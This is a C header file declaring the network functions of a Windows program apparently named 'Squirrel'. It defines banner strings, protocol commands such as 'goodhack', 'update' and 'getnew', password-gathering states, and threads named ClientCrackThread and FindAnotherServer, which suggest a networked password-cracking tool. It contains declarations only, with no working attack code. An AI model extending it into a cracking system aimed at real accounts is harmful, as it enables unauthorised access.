//////////////////////////////////////////////////////////////////////
//
// netfunc.h
// for network functions
//
// 
//
//                                                    XIII
//////////////////////////////////////////////////////////////////////

#ifndef _NETFUNC_H_
#define _NETFUNC_H_

#include <windows.h>

#include "definition.h"
#include "lib.h"
#include "version.h"
#include "filefunc.h"
#include "sq_util.h"

// server banners defenitions
#define BANNER	"220 Squirrel.\n"
#define INTERR	"500 Internal error.\n"
#define ERRFILE	"404 File not found.\n"
#define XZ		"505 Command not found.\n"
// server comands defenitions
#define PING		"Squi"
#define PONG		"rrel"
#define VER			"ver"
#define UPDATE		"update"
#define GETNEW		"getnew"
#define GOODHACK	"goodhack"
#define TERMINATION	"termination"
#define BORDEREND	"borderend"
#define BYE			"bye"

#define FILEBLOCKSIZE 1024
//#define GOOD	169

// state

#define STATE_CHECKS	83

#define STATE_STOP		90
#define STATE_GETPAS	91
#define STATE_GETBOR	92
#define STATE_GETBOR2	93
#define STATE_GETVPAS	94

#ifdef WIN32
void wsa_init(void);
void wsa_end();
#endif //#ifdef WIN32

int start_serv_sock();
void net_freeze(int do_freeze);
DWORD WINAPI ServerThread(LPVOID lpParameter);
DWORD WINAPI SexToClient(LPVOID client_socket);

int parse_server_command(char* buf,int length);

DWORD WINAPI FindAnotherServer(LPVOID lpParameter);

DWORD WINAPI ClientThread(LPVOID lpParameter);

DWORD WINAPI ClientCrackThread(LPVOID lpParameter);

#endif // #ifndef _NETFUNC_H_
